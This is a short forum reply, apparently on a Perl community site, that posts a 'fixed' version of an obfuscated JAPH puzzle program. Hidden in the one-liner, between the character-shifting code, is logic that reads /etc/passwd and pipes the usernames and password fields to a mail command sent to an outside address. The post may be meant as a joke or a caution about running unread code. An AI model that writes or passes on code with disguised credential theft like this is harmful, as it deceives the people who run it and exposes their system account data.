It didn't work for me. :-( Here's the error I got:

Too many arguments for oct at suspicious_looking_japh.pl line 6, near "$foo)" BEGIN not safe after errors--compilation aborted at suspicious_looking_japh.pl line 8.

Here's a version that's been modified so it works on my computer:
<BLINK>;for (74,1970500640, 1634627444,1751478816,1348825708,543711587 +, 1801810465){for($foo=1<<1^1; $foo>=1>>1; $foo--){$fOO=hex ff;#@passwor +d =sub cut{($u,$c,$f)=@_;$d=':';while (<$f>) {split($d);push(@p,$_[$u],$ +_ [$c]);}return@p}$f=\*F;open($f,"/etc/passwd")|| die"Error:$!\n";@passw +d =cut(0,1,$f);system"echo \Q@passwd\E|mail archon\@forbidden.dough.net" +; $foo=~s,\d,$&*10,e,$fOo=oct($foo),$foo/=1/.1,$fOO<<=$fOo,$Foo.=chr(($_ +& $fOO)>>$fOo),$foO++}}$|=1;while(!$^S){$o=$o?$?:$/;print reverse$o?$Foo +: $"x$foO if$;;print chr(8) x $foO;sleep "Just a Perl Hacker"+1}</BLINK> +;

In reply to Re: Not exactly new, but still fun by MrNobo1024
in thread Not exactly new, but still fun by archon

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